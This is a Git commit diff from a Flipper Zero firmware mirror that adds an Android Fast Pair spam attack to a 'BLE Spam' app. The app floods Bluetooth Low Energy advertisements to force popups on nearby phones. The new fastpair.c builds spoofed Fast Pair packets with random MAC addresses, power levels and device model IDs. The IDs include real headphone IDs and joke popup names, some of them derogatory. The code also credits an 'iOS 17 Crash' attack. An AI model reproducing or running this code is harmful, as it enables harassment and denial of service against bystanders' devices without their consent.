Mirror/Momentum-Firmware
1
0
Fork 0
mirror of https://github.com/Next-Flip/Momentum-Firmware.git synced 2026-05-13 07:48:35 -07:00
Code Issues Packages Projects Releases Wiki Activity

BLE Spam add Android FastPair spam

Browse Source 
Co-authored-by: Spooks <62370103+Spooks4576@users.noreply.github.com>
This commit is contained in:
Willy-JL
2023-10-15 18:53:31 +01:00
parent 0465f3ca31
commit 74c3ab88d9
7 changed files with 103 additions and 3 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
applications/external/ble_spam/application.fam vendored
View File

@@ -6,7 +6,7 @@ App(
stack_size=4 * 1024, stack_size=4 * 1024,
fap_icon="ble_spam_10px.png", fap_icon="ble_spam_10px.png",
fap_category="Bluetooth", fap_category="Bluetooth",
fap_author="@Willy-JL & @ECTO-1A", fap_author="@Willy-JL @ECTO-1A @Spooks4576",
fap_weburl="https://github.com/Flipper-XFW/Xtreme-Apps/tree/dev/ble_spam", fap_weburl="https://github.com/Flipper-XFW/Xtreme-Apps/tree/dev/ble_spam",
fap_version="2.0", fap_version="2.0",
fap_description="Flood BLE advertisements to cause spammy and annoying popups/notifications", fap_description="Flood BLE advertisements to cause spammy and annoying popups/notifications",

18
applications/external/ble_spam/ble_spam.c vendored
View File

@@ -7,7 +7,8 @@
// Hacked together by @Willy-JL // Hacked together by @Willy-JL
// Custom adv API by @Willy-JL (idea by @xMasterX) // Custom adv API by @Willy-JL (idea by @xMasterX)
// iOS 17 Crash by @ECTO-1A // iOS 17 Crash by @ECTO-1A
// Research on behaviors and parameters by @Willy-JL and @ECTO-1A // Android Pairs by @Spooks4576 and @ECTO-1A
// Research on behaviors and parameters by @Willy-JL, @ECTO-1A and @Spooks4576
// Controversy explained at https://willyjl.dev/blog/the-controversy-behind-apple-ble-spam // Controversy explained at https://willyjl.dev/blog/the-controversy-behind-apple-ble-spam
typedef struct { typedef struct {
@@ -84,6 +85,19 @@ static Attack attacks[] = {
}, },
}, },
}, },
{
.title = "Android Device Pair",
.text = "~15min cooldown, long range",
.payload =
{
.random_mac = true,
.protocol = &ble_spam_protocol_fastpair,
.msg =
{
.fastpair = {},
},
},
},
}; };
#define ATTACK_COUNT ((signed)COUNT_OF(attacks)) #define ATTACK_COUNT ((signed)COUNT_OF(attacks))
@@ -242,7 +256,7 @@ static void draw_callback(Canvas* canvas, void* ctx) {
AlignTop, AlignTop,
"App+Spam: \e#WillyJL\e# XFW\n" "App+Spam: \e#WillyJL\e# XFW\n"
"Apple+Crash: \e#ECTO-1A\e#\n" "Apple+Crash: \e#ECTO-1A\e#\n"
"\n" "Android: \e#Spooks4576\e#\n"
" Version \e#2.0\e#", " Version \e#2.0\e#",
false); false);
break; break;

BIN
applications/external/ble_spam/icons/android.png vendored Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 5.0 KiB

1
applications/external/ble_spam/protocols/_registry.c vendored
View File

@@ -2,6 +2,7 @@
const BleSpamProtocol* ble_spam_protocols[] = { const BleSpamProtocol* ble_spam_protocols[] = {
&ble_spam_protocol_continuity, &ble_spam_protocol_continuity,
&ble_spam_protocol_fastpair,
}; };
const size_t ble_spam_protocols_count = COUNT_OF(ble_spam_protocols); const size_t ble_spam_protocols_count = COUNT_OF(ble_spam_protocols);

2
applications/external/ble_spam/protocols/_registry.h vendored
View File

@@ -1,9 +1,11 @@
#pragma once #pragma once
#include "continuity.h" #include "continuity.h"
#include "fastpair.h"
union BleSpamMsg { union BleSpamMsg {
ContinuityMsg continuity; ContinuityMsg continuity;
FastpairMsg fastpair;
}; };
extern const BleSpamProtocol* ble_spam_protocols[]; extern const BleSpamProtocol* ble_spam_protocols[];

72
applications/external/ble_spam/protocols/fastpair.c vendored Normal file
View File

@@ -0,0 +1,72 @@
#include "fastpair.h"
#include "_registry.h"
// Hacked together by @Willy-JL and @Spooks4576
// Documentation at https://developers.google.com/nearby/fast-pair/specifications/introduction
const char* fastpair_get_name(const BleSpamMsg* _msg) {
const FastpairMsg* msg = &_msg->fastpair;
UNUSED(msg);
return "FastPair";
}
void fastpair_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSpamMsg* _msg) {
const FastpairMsg* msg = _msg ? &_msg->fastpair : NULL;
uint32_t model_id;
if(msg && msg->model_id != 0x000000) {
model_id = msg->model_id;
} else {
const uint32_t models[] = {
// Genuine devices
0xCD8256, // Bose NC 700
0xF52494, // JBL Buds Pro
0x718FA4, // JBL Live 300TWS
0x821F66, // JBL Flip 6
0x92BBBD, // Pixel Buds
// Custom debug popups
0xAA1FE1, // ClownMaster
0xAA187F, // VBucks
0xF38C02, // Boykisser
0x1448C9, // BLM
0xD5AB33, // Xtreme
0x13B39D, // Talking Sasquach
};
model_id = models[rand() % COUNT_OF(models)];
}
uint8_t size = 17;
uint8_t* packet = malloc(size);
uint8_t i = 0;
packet[i++] = 2; // Size
packet[i++] = 0x01; // AD Type (Flags)
packet[i++] = 0x02 + (0x04 * (rand() % 2)); // GENERAL_DISC_MODE + maybe BR_EDR_NOT_SUPPORTED
packet[i++] = 3; // Size
packet[i++] = 0x03; // AD Type (Service UUID List)
packet[i++] = 0x2C; // Service UUID (Google LLC, FastPair)
packet[i++] = 0xFE; // ...
packet[i++] = 6; // Size
packet[i++] = 0x16; // AD Type (Service Data)
packet[i++] = 0x2C; // Service UUID (Google LLC, FastPair)
packet[i++] = 0xFE; // ...
packet[i++] = (model_id >> 0x10) & 0xFF; // Model ID
packet[i++] = (model_id >> 0x08) & 0xFF; // ...
packet[i++] = (model_id >> 0x00) & 0xFF; // ...
packet[i++] = 2; // Size
packet[i++] = 0x0A; // AD Type (Tx Power Level)
packet[i++] = (rand() % 120) - 100; // -100 to +20 dBm
*out_size = size;
*out_packet = packet;
}
const BleSpamProtocol ble_spam_protocol_fastpair = {
.icon = &I_android,
.get_name = fastpair_get_name,
.make_packet = fastpair_make_packet,
};

11
applications/external/ble_spam/protocols/fastpair.h vendored Normal file
View File

@@ -0,0 +1,11 @@
#pragma once
#include "_base.h"
// Hacked together by @Willy-JL and @Spooks4576
// Documentation at https://developers.google.com/nearby/fast-pair/specifications/introduction
typedef struct {
uint32_t model_id;
} FastpairMsg;
extern const BleSpamProtocol ble_spam_protocol_fastpair;